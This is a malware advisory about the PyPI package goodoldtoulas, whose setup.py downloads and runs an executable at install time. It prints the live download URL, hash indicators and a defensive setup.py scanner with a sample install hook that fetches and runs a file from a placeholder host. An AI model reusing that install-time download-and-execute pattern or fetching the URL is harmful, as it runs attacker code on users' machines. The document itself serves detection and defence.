Malicious package: goodoldtoulas (PyPI)

Malicious code in goodoldtoulas (PyPI) Remove it immediately and rotate any exposed credentials.

MAL-2026-5271
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
pip uninstall goodoldtoulas

What this malware does

During pip install goodoldtoulas, setup.py invokes setup_helper() which downloads main.exe from https://cold-eu-par-1.gofile.io/download/web/deb39e07-da2d-4081-a86b-6380e555788c/main.exe (anonymous file host) into C:\MALWARE_DELETE and executes it via os.system('main.exe') (setup.py lines 6, 21, 33). The fetch is unpinned, has no hash verification, the destination is an opaque Windows binary, the host is not the publisher's domain, and the staging path name is self-incriminating. Any installer running pip install of this package on Windows fetches and executes an attacker-controlled binary at install time.

During installation, the package attempts to download and run an executable, imitating malicious activity.

Category: PROBABLY_PENTEST - Packages that look like typical pentest packages, but also anything that looks like testing, exploration of pre-prepared kits, research and the like, with clearly low potential for harm.

Campaign: 2026-06-goodoldtoulas

Reasons (based on the campaign):

  • The package overrides the install command in setup.py to execute malicious code during installation.

  • Downloads and executes a remote executable.
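The two behaviours listed above (an overridden install command and a remote fetch-and-execute at install time) are both visible statically in setup.py. The following is an added example, not code from the advisory or from O3 Security: it parses a setup.py with Python's ast module and reports calls that fetch or execute external code, plus any cmdclass entry that overrides 'install'. The sample setup.py is constructed for the demo; its URL is a placeholder, not the indicator from this advisory.

```python
"""Static check for install-time code-execution indicators in a setup.py.

Added example (not part of the advisory or O3 Security's tooling). It flags
the two behaviours the advisory names: an overridden install command
(cmdclass={'install': ...}) and calls that download or execute something
while setup.py runs.
"""
import ast

# Dotted call names that fetch or execute something at install time.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_output",
    "urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get",
}

# Constructed sample mimicking the pattern described in the advisory.
# The URL is a placeholder (example.invalid), not a real indicator.
SAMPLE_SETUP_PY = '''\
import os
import urllib.request
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        urllib.request.urlretrieve("https://example.invalid/placeholder.exe", "payload.exe")
        os.system("payload.exe")

setup(name="demo", version="0.1.0", cmdclass={"install": PostInstall})
'''


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source):
    """Return findings (one string per indicator) sorted by line number."""
    tree = ast.parse(source)
    findings = set()
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name in SUSPICIOUS_CALLS:
            findings.add(f"line {node.lineno}: call to {name}")
        # setup(..., cmdclass={'install': SomeClass}) replaces the install step
        if name in ("setup", "setuptools.setup"):
            for kw in node.keywords:
                if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                    for key in kw.value.keys:
                        if isinstance(key, ast.Constant) and key.value == "install":
                            findings.add(f"line {kw.value.lineno}: cmdclass overrides 'install'")
    return sorted(findings, key=lambda s: int(s.split()[1].rstrip(":")))


if __name__ == "__main__":
    for finding in scan_setup_py(SAMPLE_SETUP_PY):
        print(finding)
```

Run it against any sdist's setup.py before installing; an empty result means none of these literal patterns appeared. The check is deliberately syntactic, so obfuscated loaders (getattr chains, exec on decoded strings, a subclass whose run() is defined elsewhere) will not be caught; treat a hit as a reason to read the file, and a miss as no evidence either way.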

Malicious versions

1 flagged: 0.1.0

Indicators of compromise (SHA-256)

24dbb5643933ff305b2eab164e820476f645ef2b59ad7c7cdfdeb2c3c3bfb98f
463564954b6a05239e3161ff46d10a0ad605c36ec4c7bda57c08db53e4044c3d
5414e9956c915ef34d422d9eba09177fb667bba375c43e9d9b54d4f87b628712

Frequently asked questions

Is goodoldtoulas safe to use?

No. goodoldtoulas on PyPI has been identified as a malicious package (version 0.1.0 flagged). It should be removed immediately; do not install it or keep it in your dependency tree.

Campaign

2026-06-goodoldtoulas
Related incidents: IN-MAL-2026-005259, IN-MAL-2026-005258

Credits

  • Amazon Inspector · finder
  • Kamil Mańkowski (kam193) · reporter

goodoldtoulas (PyPI) malicious package — MAL-2026-5271 | O3 Security